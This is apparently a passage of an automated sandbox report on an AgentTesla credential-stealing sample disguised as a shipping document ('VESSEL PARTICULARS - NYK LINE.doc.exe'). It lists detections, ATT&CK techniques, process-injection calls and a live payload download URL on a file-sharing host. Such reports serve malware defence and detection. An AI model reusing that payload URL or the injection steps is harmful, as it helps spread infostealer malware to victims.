                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4110a88.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.775407725.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493088206.00000000040F8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.503807801.0000000002FF2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.783730951.0000000002F61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 5204, type: MEMORYSTR
                      Source: Yara matchFile source: 0000001D.00000002.783730951.0000000002F61000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4110a88.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.775407725.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493088206.00000000040F8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.503807801.0000000002FF2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.783730951.0000000002F61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 5204, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools1Input Capture1File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsService Execution2Windows Service1Application Shimming1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery13Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Access Token Manipulation1Obfuscated Files or Information12Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Windows Service1Timestomp1NTDSSecurity Software Discovery11Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptProcess Injection11Masquerading11LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 492154 Sample: VESSEL PARTICULARS - NYK LI... Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 41 www.twitter.com 2->41 43 www.google.com 2->43 45 3 other IPs or domains 2->45 61 Multi AV Scanner detection for dropped file 2->61 63 Multi AV Scanner detection for submitted file 2->63 65 Yara detected AgentTesla 2->65 67 6 other signatures 2->67 8 VESSEL PARTICULARS - NYK LINE.doc.exe 15 7 2->8         started        signatures3 process4 dnsIp5 47 store2.gofile.io 31.14.69.10, 443, 49746 LINKER-ASFR Virgin Islands (BRITISH) 8->47 33 C:\...\VESSEL PARTICULARS - NYK LINE.doc.exe, PE32 8->33 dropped 35 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 8->35 dropped 37 VESSEL PARTICULARS...exe:Zone.Identifier, ASCII 8->37 dropped 39 VESSEL PARTICULARS...YK LINE.doc.exe.log, ASCII 8->39 dropped 12 powershell.exe 18 8->12         started        15 powershell.exe 18 8->15         started        17 powershell.exe 8->17         started        19 9 other processes 8->19 file6 process7 dnsIp8 49 192.168.2.1 unknown unknown 12->49 51 www.google.com 12->51 21 conhost.exe 12->21         started        53 www.facebook.com 15->53 55 star-mini.c10r.facebook.com 15->55 23 conhost.exe 15->23         started        57 www.twitter.com 17->57 59 twitter.com 17->59 25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        29 AdvancedRun.exe 19->29         started        31 AdvancedRun.exe 19->31         started        process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      VESSEL PARTICULARS - NYK LINE.doc.exe59%VirustotalBrowse
                      VESSEL PARTICULARS - NYK LINE.doc.exe31%MetadefenderBrowse
                      VESSEL PARTICULARS - NYK LINE.doc.exe86%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      VESSEL PARTICULARS - NYK LINE.doc.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\AdvancedRun.exe0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe59%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe31%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe86%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      https://sectigo.com/CPS0C0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      star-mini.c10r.facebook.com
                      		157.240.9.35
                      		truefalse
                        		high
                        twitter.com
                        		104.244.42.129
                        		truefalse
                          		high
                          www.google.com
                          		142.250.185.196
                          		truefalse
                            		high
                            store2.gofile.io
                            		31.14.69.10
                            		truefalse
                              		high
                              www.facebook.com
                              		unknown
                              		unknownfalse
                                		high
                                www.twitter.com
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://store2.gofile.io/download/956f4086-c03d-4dbb-9647-f6db09f6a8b5/Iyybawggybiqbtxofebfdynt.dllfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://store2.gofile.ioVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503252579.0000000002E61000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.comVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersGVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/?VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn/bTheVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://ocsp.sectigo.com0VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers?VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.tiro.comVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designersVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.goodfont.co.krVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.carterandcone.comlVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.sajatypeworks.comVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.typography.netDVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlNVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn/cTheVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htmVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://fontfabrik.comVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.founder.com.cn/cnVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/frere-jones.htmlVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://sectigo.com/CPS0CVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://sectigo.com/CPS0DVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/DPleaseVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers8VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.fonts.comVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.sandoll.co.krVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.urwpp.deDPleaseVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000015.00000000.474256722.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000016.00000000.488640452.000000000040C000.00000002.00020000.sdmpfalse
                                                            		high
                                                            http://www.zhongyicts.com.cnVESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
